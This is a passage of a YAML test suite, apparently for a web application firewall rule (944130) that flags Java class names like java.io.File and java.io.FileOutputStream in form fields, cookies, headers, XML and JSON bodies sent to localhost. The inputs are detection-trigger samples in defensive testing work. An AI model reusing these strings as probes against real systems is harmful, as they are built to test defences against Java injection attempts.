Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.DataInputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-87 desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.DataInputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-88 desc: "Argument test includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.File" output: log_contains: "id \"944130\"" - test_title: 944130-89 desc: "Argument name includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.File=test" output: log_contains: "id \"944130\"" - test_title: 944130-90 desc: "Cookie test includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.File method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-91 desc: "Cookie name includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.File=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-92 desc: "Request header test includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.File method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-93 desc: "XML attribute value includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-94 desc: "XML element value includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.File" output: log_contains: "id \"944130\"" - test_title: 944130-95 desc: "Nested XML element value includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.File" output: log_contains: "id \"944130\"" - test_title: 944130-96 desc: "Content-Type text/plain includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.File" output: log_contains: "id \"944130\"" - test_title: 944130-97 desc: "Content-Type application/json arg value includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.File\"}" output: log_contains: "id \"944130\"" - test_title: 944130-98 desc: "Content-Type application/json arg name includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.File\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-99 desc: "Argument test includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.FileOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-100 desc: "Argument name includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.FileOutputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-101 desc: "Cookie test includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.FileOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-102 desc: "Cookie name includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.FileOutputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-103 desc: "Request header test includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.FileOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-104 desc: "XML attribute value includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-105 desc: "XML element value includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FileOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-106 desc: "Nested XML element value includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FileOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-107 desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.FileOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-108 desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.FileOutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-109 desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.FileOutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-110 desc: "Argument test includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.FilterInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-111 desc: "Argument name includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.FilterInputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-112 desc: "Cookie test includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.FilterInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-113 desc: "Cookie name includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.FilterInputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-114 desc: "Request header test includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.FilterInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-115 desc: "XML attribute value includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-116 desc: "XML element value includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FilterInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-117 desc: "Nested XML element value includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FilterInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-118 desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.FilterInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-119 desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.FilterInputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-120 desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.FilterInputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-121 desc: "Argument test includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.FilterOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-122 desc: "Argument name includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.FilterOutputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-123 desc: "Cookie test includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.FilterOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-124 desc: "Cookie name includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.FilterOutputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-125 desc: "Request header test includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.FilterOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-126 desc: "XML attribute value includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-127 desc: "XML element value includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FilterOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-128 desc: "Nested XML element value includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FilterOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-129 desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.FilterOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-130 desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.FilterOutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-131 desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.FilterOutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-132 desc: "Argument test includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.FilterReader" output: log_contains: "id \"944130\"" - test_title: 944130-133 desc: "Argument name includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.FilterReader=test" output: log_contains: "id \"944130\"" - test_title: 944130-134 desc: "Cookie test includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.FilterReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-135 desc: "Cookie name includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.FilterReader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: 